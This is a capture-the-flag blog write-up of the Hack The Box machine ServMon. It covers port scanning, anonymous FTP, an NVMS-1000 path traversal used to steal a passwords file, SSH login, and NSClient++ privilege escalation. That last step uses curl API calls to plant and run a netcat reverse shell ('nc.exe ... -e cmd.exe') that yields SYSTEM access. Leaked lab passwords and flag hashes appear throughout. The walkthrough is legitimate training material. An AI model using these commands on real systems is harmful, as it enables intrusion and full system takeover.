Home Hack The Box Write-Up ServMon - 10.10.10.184
Post
Cancel

Hack The Box Write-Up ServMon - 10.10.10.184

Monitoring is not protection.

Myself

About ServMon

In this post, I’m writing a write-up for the machine ServMon from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

ServMon is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.

Foothold

After the port scan, I found some interesting open ports, like 21/tcp (FTP), 80/tcp (HTTP) and 8443/tcp (alt-HTTPS). Anonymous FTP login is allowed and through FTP I found in the folder of Nathan a txt-file with the message that there is a passwords.txt file placed on his Desktop. Then, I checked the service on the HTTP port and it seems that the NVMS-1000 software has a Path Traversal vulnerability.

User

Through the Path Traversal vulnerability, I was able to read the passwords.txt file from the Desktop of Nathan and establish an SSH connection with the user account of Nadine and grab the user flag.

Root

I checked the 8443/tcp port and found that the software NSClient++ is running on this box. After checking the version of NSClient++ I found that there is a known vulnerability for this particular version. Through the API I was able to put a revshell.bat in the scripts folder and execute this file. The reverse shell was established with Local System privileges.

Machine Info

hackthebox-servmom-machine-info

hackthebox-servmom-machine-ip-and-creators

Recon

Port scan with Nmap

As always we start with a port scan with Nmap.

1
nmap -sC -sV -oA ./nmap/servmon.txt 10.10.10.184

The results of the port scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-11 15:14 EDT                                                                                                                                                                                            
Nmap scan report for 10.10.10.184                                                                                                                                                                                                                          
Host is up (0.063s latency).                                                                                                                                                                                                                               
Not shown: 991 closed ports                                                                                                                                                                                                                                
PORT     STATE SERVICE       VERSION                                                                                                                                                                                                                       
21/tcp   open  ftp           Microsoft ftpd                                                                                                                                                                                                                
| ftp-anon: Anonymous FTP login allowed (FTP code 230)                                                                                                                                                                                                     
|_01-18-20  12:05PM       <DIR>          Users                                                                                                                                                                                                             
| ftp-syst:                                                                                                                                                                                                                                                
|_  SYST: Windows_NT                                                                                                                                                                                                                                       
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)                                                                                                                                                                                        
| ssh-hostkey:                                                                                                                                                                                                                                             
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)                                                                                                                                                                                             
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)                                                                                                                                                                                            
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)                                                                                                                                                                                          
80/tcp   open  http                                                                                                                                                                                                                                        
| fingerprint-strings:                                                                                                                                                                                                                                     
|   GetRequest, HTTPOptions, RTSPRequest:                                                                                                                                                                                                                  
|     HTTP/1.1 200 OK                                                                                                                                                                                                                                      
|     Content-type: text/html                                                                                                                                                                                                                              
|     Content-Length: 340                                                                                                                                                                                                                                  
|     Connection: close                                                                                                                                                                                                                                    
|     AuthInfo:                                                                                                                                                                                                                                            
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">                                                                                                                            
|     <html xmlns="http://www.w3.org/1999/xhtml">                                                                                                                                                                                                          
|     <head>                                                                                                                                                                                                                                               
|     <title></title>                                                                                                                                                                                                                                      
|     <script type="text/javascript">                                                                                                                                                                                                                      
|     window.location.href = "Pages/login.htm";                                                                                                                                                                                                            
|     </script>                                                                                                                                                                                                                                            
|     </head>                                                                                                                                                                                                                                              
|     <body>                                                                                                                                                                                                                                               
|     </body>                                                                                                                                                                                                                                              
|     </html>                                                                                                                                                                                                                                              
|   NULL:                                                                                                                                                                                                                                                  
|     HTTP/1.1 408 Request Timeout                                                                                                                                                                                                                         
|     Content-type: text/html                                                                                                                                                                                                                              
|     Content-Length: 0                                                                                                                                                                                                                                    
|     Connection: close                                                                                                                                                                                                                                    
|_    AuthInfo:                                                                                                                                                                                                                                            
|_http-title: Site doesn't have a title (text/html).                                                                                                                                                                                                       
135/tcp  open  msrpc         Microsoft Windows RPC                                                                                                                                                                                                         
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                                                                                                                 
445/tcp  open  microsoft-ds?                                                                                                                                                                                                                               
5666/tcp open  tcpwrapped                                                                                                                                                                                                                                  
6699/tcp open  napster?                                                                                                                                                                                                                                    
8443/tcp open  ssl/https-alt                                                                                                                                                                                                                               
| fingerprint-strings:                                                                                                                                                                                                                                     
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:                                                                                                                                                                                               
|     HTTP/1.1 404                                                                                                                                                                                                                                         
|     Content-Length: 18                                                                                                                                                                                                                                   
|     Document not found                                                                                                                                                                                                                                   
|   GetRequest:                                                                                                                                                                                                                                            
|     HTTP/1.1 302                                                                                                                                                                                                                                         
|     Content-Length: 0                                                                                                                                                                                                                                    
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=4/11%Time=5E921736%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=4/11%Time=5E92173E%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0t\0t\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x18\
SF:x02\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x20
SF:18\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\
SF:x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTS
SF:PRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\
SF:x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\
SF:x2018\r\n\r\nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m29s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-11T19:19:20
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.74 seconds

There are some interesting ports open:

  1. 21/tcp (FTP)
  2. 22/tcp (SSH)
  3. 80/TCP (HTTP)
  4. 8443/tcp (alternative HTTPS)

FTP Anonymous login

Let’s go for the low hanging fruit first. Anonymous access for FTP is allowed, let’s check that first and let’s directly login as anonymous with the default password anonymous.

1
2
3
4
5
6
7
8
9
~ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>

Let’s poke some around.

1
2
3
4
5
6
7
8
9
10
11
12
13
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp> cd users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.

I got two user folders Nadine and Nathan. From the directory Nadine I have downloaded a file called Confidential.txt and from the folder of Nathan I downloaded the file Notes to do.txt.

Confidential.txt
This file contains a note from someone with the note that there is a password.txt file left on his desktop. Furthermore, this file is pointing to some secure folder.

1
2
3
4
5
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

[: file=’Confidential.txt’]

Notes to do.txt
This is an unfinished todo list of Nathan.

1
2
3
4
5
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

There are no more files for now, let’s checking the other open ports.

NVMS-1000

The next port in the enumeration phase is the HTTP port. I visited the webpage http://10.10.10.184. I landed on a login page of NVMS-1000. This web server is hosting Network Surveillance Management Software. NVMS-1000 is a monitoring client that is specially designed for network video surveillance.

Maybe I have already found the name of this box: ServMon, Server Monitoring?

hackthebox-servmom-HTTP-NVMS-1000

I have tried some default username and password combinations, but they are not working. After searching some around on the internet I found that a specific version of NVMS-1000 is vulnerable for Directory Traversal according to this article: https://www.exploit-db.com/exploits/47774. CVE-2019-20085 was assigned to this vulnerability.

I checked this with Burpsuite and I found that this NVMS-1000 is vulnerable for directory traversal attack. I tried to read the /windows/win.ini, every time when the GET is failing I add a extra /../.

hackthebox-servmom-NVMS-1000-directory-traversal

Ok, now I need to put the pieces together.

Intrusion

SSH shell as Nadine

I know that there is on the desktop of Nathan a file called passwords.txt. As the NVMS-1000 has a Path Traversal vulnerability I could get that file and grab the passwords.

hackthebox-servmom-NVMS-1000-path-traversal-attack

I have now a list of passwords. I placed all of this passwords in a file called passwords.txt.

1
2
3
4
5
6
7
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

As the SSH port is open I tried first to get an SSH shell as the user Nathan but the passwords are not working for his account. Then I’ve switched to the user account Nadine and managed to get a shell with the password L1k3B1gBut7s@W0rk.

Get the user flag and I can go to the next step: privilege escalation.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
~$ ssh [email protected]
Microsoft Windows &#91;Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
15/04/2020  20:51                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,418,095,616 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
7f26c77e1ccd17cede33c1b950c26e4e

nadine@SERVMON C:\Users\Nadine\Desktop>

Privilege Escalation

Enumeration

There is a non-default port open on this box, this the port 8443/tcp (alt-https). When I visit this web page through the URL https://10.10.10.184:8443 I landed on the Sign In page of NSClient++. I tried to log in with the passwords I already know, but none of them are working. They are all resulting in a 403 Your not allowed notification.

hackthebox-servmom-NSClient

I have already an active SSH session with the user account Nadine. Let’s try to find out which version of NSClient++ this box is running and I need to find the password. On the Documentation webpage from NSClient++ (https://docs.nsclient.org/). I found how I can grab the web administrator password.

1
2
3
4
5
6
7
8
9
nadine@SERVMON C:\Users\Nadine>powershell                                                                                                                                                                                                  
Windows PowerShell                                                                                                                                                                                                                         
Copyright (C) Microsoft Corporation. All rights reserved.                                                                                                                                                                                  
                                                                                                                                                                                                                                           
Try the new cross-platform PowerShell https://aka.ms/pscore6                                                                                                                                                                               
                                                                                                                                                                                                                                           
PS C:\Users\Nadine> cd 'C:\Program Files\NSClient++\'                                                                                                                                                                                      
PS C:\Program Files\NSClient++> .\nscp.exe web password --display
Current password: ew2x6SsGTxjRwXOT

So, the password is ew2x6SsGTxjRwXOT. With the command below I can check the current installed version of NSClient++.

1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\Program Files\NSClient++> .\nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64

I know that this box is running NSClient++, I know the password and the version of this software. This has to be the way to root this box. Through searchsploit, I checked if there is a known vulnerability for this version of NSClient++ and it seems the case.

~$ searchsploit nsclient++
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                    |  Path
                                                                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
NSClient++ 0.5.2.35 - Privilege Escalation                                                                                                                                                        | exploits/windows/local/46802.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

On this webpage of exploit-db: https://www.exploit-db.com/exploits/46802 there is an explanation about how to get a reverse shell with Local System privileges.

Explotation

NSClient++

I found out there are two ways to root this box:

  1. Through the GUI
  2. or through the API

I’m new to API and I want to learn something, so I choose the API way, in my opinion the easiest way to root this box. I checked the API documentation of NSClient++ for the commands. I started by removing the curl alias in Powershell because it refers to the Invoke-WebRequest cmdlet in Powershell. I do not want to use this cmdlet.

1
PS C:\Program Files\NSClient++> Remove-Item alias:curl

First, I checked if I can call the API throuh the SSH session of Nadine. And it worked.

1
2
3
4
5
PS C:\Users\Nadine> curl -k -u admin https://localhost:8443/api/v1                                                   │
Enter host password for user 'admin':                                                                                │
{"info_url":"https://localhost:8443/api/v1/info","logs_url":"https://localhost:8443/api/v1/logs","modules_url":"https│
://localhost:8443/api/v1/modules","queries_url":"https://localhost:8443/api/v1/queries","scripts_url":"https://localh│
ost:8443/api/v1/scripts"}

As CheckExternalScripts and Scheduler are enabled already, I only have to place the script in the C:\Program Files\NSClient++\Scripts directory through the API and run this script. I invoked the command below and placed a reverse shell script, named revshell.bat. Of course, I placed the nc.exe file in the C:\Temp directory.

1
curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary "C:\Temp\nc.exe 10.10.14.42 4444 -e cmd.exe"

With this command I call the script.

1
curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=3m

The reverse shell is established and I can now grab the root flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
~$ nc -lvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.184.
Ncat: Connection from 10.10.10.184:50184.
Microsoft Windows &#91;Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

C:\Program Files\NSClient++>type "C:\Users\Administrator\Desktop\root.txt"
type "C:\Users\Administrator\Desktop\root.txt"
d3d0930a47b35c8ae6ff3689411bf7ad

C:\Program Files\NSClient++>

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856.com/profile/224856. Thanks!

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.